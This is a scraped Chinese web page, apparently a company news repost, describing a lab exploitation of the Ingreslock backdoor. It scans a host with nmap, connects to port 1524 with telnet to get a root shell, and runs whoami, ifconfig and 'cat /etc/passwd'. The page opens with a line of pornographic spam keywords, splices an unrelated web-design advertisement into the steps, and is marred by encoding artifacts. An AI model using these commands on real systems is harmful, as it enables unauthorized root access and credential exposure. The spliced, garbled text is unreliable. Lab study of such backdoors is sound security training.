真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

Ingreslock后門漏洞

利用telnet命令連接目標(biāo)主機的1524端口,直接獲取root權(quán)限。

目前成都創(chuàng)新互聯(lián)已為千余家的企業(yè)提供了網(wǎng)站建設(shè)、域名、網(wǎng)絡(luò)空間、成都網(wǎng)站托管、企業(yè)網(wǎng)站設(shè)計、色尼網(wǎng)站維護(hù)等服務(wù),公司將堅持客戶導(dǎo)向、應(yīng)用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長,共同發(fā)展。

Ingreslock后門程序監(jiān)聽在1524端口,連接到1524端口就可以直接獲得root權(quán)限, 經(jīng)常被用于***一個暴露的服務(wù)器。

 一、利用nmap工具掃描目標(biāo)主機

1.1使用nmap命令對目標(biāo)主機進(jìn)行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。

1.2在終端中輸入命令“nmap –sV  192.168.1.3”,對目標(biāo)主機進(jìn)行端口掃描,發(fā)現(xiàn)開放1524端口。

Ingreslock后門漏洞

1.3在終端中輸入命令“telnet 192.168.1.3 1524”,連接目標(biāo)主機1524端口,先是連接成功。如圖3所示

1.4在終端中輸入命令“whoami”,查找獲取的權(quán)限。如圖4所示

Ingreslock后門漏洞

1.5在終端中輸入命令“ifconfig eth0”,查看網(wǎng)卡信息,在終端下輸入“cat /etc/passwd”,查看遠(yuǎn)程主機的密碼文件。

Ingreslock后門漏洞

Ingreslock后門漏洞


新聞名稱:Ingreslock后門漏洞
新聞來源:http://weahome.cn/article/ggchoj.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部